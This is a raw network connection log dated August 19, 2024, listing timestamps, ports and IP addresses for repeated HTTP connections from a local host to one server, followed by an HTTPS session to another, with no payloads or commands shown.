Aug 19, 2024 09:28:28.898917913 CEST	49753	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:28.898941040 CEST	49753	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:28.903731108 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:28.903831005 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.965559959 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.966121912 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.966214895 CEST	49753	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.966258049 CEST	49753	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.971069098 CEST	80	49753	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.972138882 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.976994038 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.977109909 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.977267981 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.977318048 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:29.982176065 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:29.982197046 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.106734991 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.106812954 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.106822968 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.106868029 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.107093096 CEST	49754	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.111927032 CEST	80	49754	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.132708073 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.165642977 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.165716887 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.165889025 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.165904999 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:31.170962095 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:31.171189070 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.230703115 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.230803967 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.231025934 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.231091976 CEST	49755	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.234081030 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.236007929 CEST	80	49755	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.239134073 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.239204884 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.239377022 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.239394903 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:32.244236946 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:32.244323969 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.315583944 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.316184044 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.316556931 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.316616058 CEST	49756	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.319453001 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.322241068 CEST	80	49756	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.325239897 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.325314045 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.325525045 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.325548887 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:33.331259012 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:33.331398010 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.392292976 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.392733097 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.392816067 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.392847061 CEST	49757	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.395378113 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.397619963 CEST	80	49757	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.400523901 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.400599003 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.400731087 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.400751114 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:34.631588936 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:34.631603003 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:35.696758032 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:35.697247028 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:35.697331905 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:35.699712038 CEST	49758	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:35.699717045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:35.699764967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:35.699820995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:35.700092077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:35.700102091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:35.704533100 CEST	80	49758	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:36.454910994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.455080986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:36.456842899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:36.456855059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.457118988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.457869053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:36.504511118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.863363028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.919142962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:36.999834061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.999849081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.999892950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.999918938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.999927998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:36.999969006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.000008106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.000027895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.000055075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.001159906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.001179934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.001216888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.001226902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.001264095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.001264095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.134835958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.134866953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.135013103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.135090113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.135158062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.135911942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.135929108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.135997057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.136013031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.136063099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.137476921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.137495041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.137558937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.137573004 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.137619019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.139182091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.139199018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.139270067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.139285088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.139333963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.533443928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.533461094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.533499002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.533576012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.533611059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.533627033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.533637047 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.533668041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.534104109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534121990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534172058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.534179926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534485102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534504890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534540892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.534548044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534569979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.534668922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534682989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534730911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.534744024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534967899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.534987926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.535022974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.535029888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.535048962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.538567066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.538584948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.538641930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.538650036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.539343119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.539364100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.539395094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.539401054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.539419889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.540715933 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.540731907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.540771961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.540779114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.540796041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.541352034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.541388035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.541408062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.541414976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.541445017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.542243958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.542257071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.542296886 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.542303085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.542325020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.543737888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.543759108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.543793917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.543801069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.543821096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.544109106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.544121027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.544167995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.544173956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.545300007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.545321941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.545367002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.545376062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.545394897 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.546189070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.546201944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.546257973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.546264887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.547127962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.547149897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.547182083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.547188044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.547208071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.548456907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.548471928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.548504114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.548511028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.548531055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.549293995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.549314022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.549341917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.549350023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.549370050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.550137043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.550152063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.550180912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.550188065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.550216913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552118063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552139044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552215099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552215099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552222967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552257061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552269936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552299976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552308083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552324057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552452087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552469969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552515984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552522898 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552541018 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552769899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552783012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552814960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.552824974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.552836895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590143919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590171099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590233088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590265036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590277910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590342045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590363979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590420961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590420961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590432882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590823889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590842962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590878010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.590886116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.590904951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.591200113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591214895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591250896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.591273069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591284037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.591506958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591527939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591563940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.591569901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.591600895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.592087030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.592102051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.592135906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.592143059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.592161894 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.632555962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.632580996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.632632971 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.632668018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.632683039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.640837908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.640861988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.640939951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.640959978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.682797909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.682826042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.682959080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.682995081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683487892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683504105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683655024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.683665037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683892012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683913946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683947086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.683955908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.683986902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.684268951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684293032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684335947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.684343100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684632063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684653997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684683084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.684694052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684705973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.684932947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684947014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.684998989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.685008049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.725234032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.725265980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.725398064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.725414038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.733058929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.733077049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.733181000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.733217001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775206089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775244951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775348902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.775388956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775403976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.775732040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775753975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775763988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775791883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.775804996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.775821924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.776374102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776401043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776433945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.776442051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776463985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.776684999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776704073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776741028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.776751041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.776767969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.777292967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777319908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777354956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.777364016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777380943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.777573109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777595997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777632952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.777642965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:37.777658939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.825522900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:37.825599909 CEST	443	49759	185.149.100.242	192.168.2.4
